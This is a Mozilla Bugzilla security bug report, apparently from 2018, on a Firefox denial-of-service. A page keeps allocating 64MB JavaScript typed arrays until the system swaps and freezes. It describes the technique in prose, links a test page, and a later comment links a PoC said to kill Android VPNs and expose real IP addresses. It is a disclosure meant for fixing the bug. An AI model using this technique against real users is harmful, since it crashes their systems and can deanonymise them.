Open Bug 1463833 Opened 7 years ago Updated 2 years ago

Denial of service with JS typed arrays (memory exhaustion / swap)

Categories

(Core :: JavaScript Engine, defect, P3)

Product:
Core
Component:
JavaScript Engine
Version:
60 Branch
Type:
defect

Tracking

()

Status:
UNCONFIRMED

People

(Reporter: brion, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: crash, csectype-dos, testcase, Whiteboard: [sg:dos])

Attachments

(1 file)

source.txt
475 bytes, text/plain
Details
Attached file source.txt
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Build ID: 20180516032328 Steps to reproduce: Load https://brionv.com/misc/crash/ (source attached) This page allocates a 64MB typed array, fills it with data, saves a reference to it in an array, and then repeats at the next timer tick. This simulates a malicious or miscoded JavaScript widget or plugin allocating memory quickly and never freeing it. Actual results: On Linux desktop with 12GB RAM and spinning HDD, system becomes almost instantly unresponsive as it goes into "swap hell", and must be rebooted to recover. On MacBook Pro with 16GB RAM and fast SSD, content process balloons up to and beyond 64GB, with swap usage over 20GB before I manually close it out (the memory compresses well so swap usage is smaller than the total allocation). System is slower but can still control it for at least a few seconds while watching RAM usage go up... Expected results: Loading the page in Safari on the MacBook Pro, memory usage gets up to around 20 GB and then the browser closes the content process and reloads the page. Swap usage remains reasonable and the machine remains responsive. Edge in a Windows 10 VM also seems to abort the content process and reload the page at an amount near the total available memory. At Wikimedia I'm doing research on user-supplied "plugins" or "widgets" that would combine HTML or SVG content with sandboxed JS scripting, using some combination of iframes/workers/CSP to lock the scripts away from the main page context. A system-level denial of service in trivial JavaScript means we can't rely on loading such plugin scripts automatically as it would make it much more difficult for people to fix or remove a misbehaving or malicious plugin. Note there are related older bugs in bugzilla such as: * https://bugzilla.mozilla.org/show_bug.cgi?id=607575 - memory denial of service through appending to document.title * https://bugzilla.mozilla.org/show_bug.cgi?id=609358 - memory denial of service through document.write Though those are DOM-related, and this technique should work fine without a DOM (such as in a Worker). If you don't feel it's a security issue, feel free to reclassify the bug as public.
Group: core-security → javascript-core-security
jkt: is this a dupe of any of the existing "eviltraps" DOS bugs? I know the JS team was reluctant to add quotas because different machines have different capabilities, but we should keep the machine alive enough to be able to close the offending tab.
Blocks: eviltraps
Flags: needinfo?(jkt)
Keywords: crash, csectype-dos, testcase
Whiteboard: [sg:dos]
Group: javascript-core-security

I'm not aware of this being a dupe. Clearing ni, sorry for the delay.

Flags: needinfo?(jkt)

Bug 432687 is P3 => this is P3

Priority: -- → P3

I just stumbled upon this bug and found that it can be used to do far worse things, including killing the system VPN on Android and revealing the user's real IP address, if the kill switch is not enabled.

Check out this PoC, which is based on the original PoC of this bug: https://github.com/noarchwastaken/vpn_killer

Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: